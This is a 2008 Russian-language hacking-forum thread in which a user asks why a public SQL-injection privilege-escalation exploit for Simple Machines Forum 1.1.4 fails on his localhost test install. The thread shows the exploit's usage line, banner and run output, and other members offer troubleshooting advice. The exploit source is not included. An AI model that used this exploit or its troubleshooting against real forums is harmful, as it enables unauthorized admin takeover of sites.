Нужна помощь по испльзованию эксплойта

Discussion in 'Песочница' started by Rashid, 26 Oct 2008.

  1. Rashid

    Rashid Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    46
    Likes Received:
    4
    Reputations:
    2
    Эксплойт: http://www.milw0rm.com/exploits/5826
    Запускаю:
    # python ./smf.py localhost /smf/ i3sdq9d8v1pe4fr20r6qjnqcs5 2

    #=================================================================#
    # Simple Machines Forum <= 1.1.4 #
    # Sql Injection Vulnerability #
    # Priviledge Escalation Exploit #
    # #
    # ###################################### #
    # # Let's get administrator rights!!! # #
    # ###################################### #
    # #
    # Discovered By The:paradox #
    # #
    # Usage: #
    # ./Exploit [Target] [Path] [PHPSessID] [Userid] #
    # #
    # Example: #
    # ./Exploit 127.0.0.1 /SMF/ a574bfe34d95074dea69c00e38851722 9 #
    # ./Exploit www.host.com / 11efb3b6031bc79a8dd7526750c42119 36 #
    #=================================================================#

    [.] Exploit Starts.
    [+] Trying to read Sesc
    [+] Sesc has been successfully read ==> 891439426d210d5c6e1d50cd68b54f0c
    [+] Creating three labels...
    [+] Sql code is going to be injected.
    [+] All done.
    Now user with ID_MEMBER 2 should have administrator rights.
    -= Paradox Got This One =-

    Насколько я правильно понимаю user with id=2 должен получить administrator rights, но этого не происходит.
    Что я делаю не так???
     
    #1 Rashid, 26 Oct 2008
  2. swt1

    swt1 Elder - Старейшина

    Joined:
    16 Feb 2008
    Messages:
    306
    Likes Received:
    78
    Reputations:
    21
    перед использованием ты должен иметь права админа,потом юзай сплойт,включен ли register_globals on?)
     
    #2 swt1, 26 Oct 2008
    Last edited: 26 Oct 2008
  3. Rashid

    Rashid Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    46
    Likes Received:
    4
    Reputations:
    2
    register_globals включен
    А смысл тогда какой в таком сплойте? Иметь права админа чтобы получить права админа?
     
    #3 Rashid, 26 Oct 2008
  4. swt1

    swt1 Elder - Старейшина

    Joined:
    16 Feb 2008
    Messages:
    306
    Likes Received:
    78
    Reputations:
    21
    верно не досмотрел)) тогда на сервере выключен регистр глобалс или стоит версия выше.
     
    #4 swt1, 26 Oct 2008
  5. Rashid

    Rashid Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    46
    Likes Received:
    4
    Reputations:
    2
    Я проверяю на localhost и весрия 1,1,4 и register_globals включен
     
    #5 Rashid, 26 Oct 2008
  6. Sleep

    Sleep Elder - Старейшина

    Joined:
    31 Oct 2007
    Messages:
    271
    Likes Received:
    65
    Reputations:
    4
    как ты его запускаеш???
     
    #6 Sleep, 26 Oct 2008
  7. Rashid

    Rashid Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    46
    Likes Received:
    4
    Reputations:
    2
    python ./smf.py localhost /smf/ i3sdq9d8v1pe4fr20r6qjnqcs5 2
     
    #7 Rashid, 26 Oct 2008
(You must log in or sign up to post here.)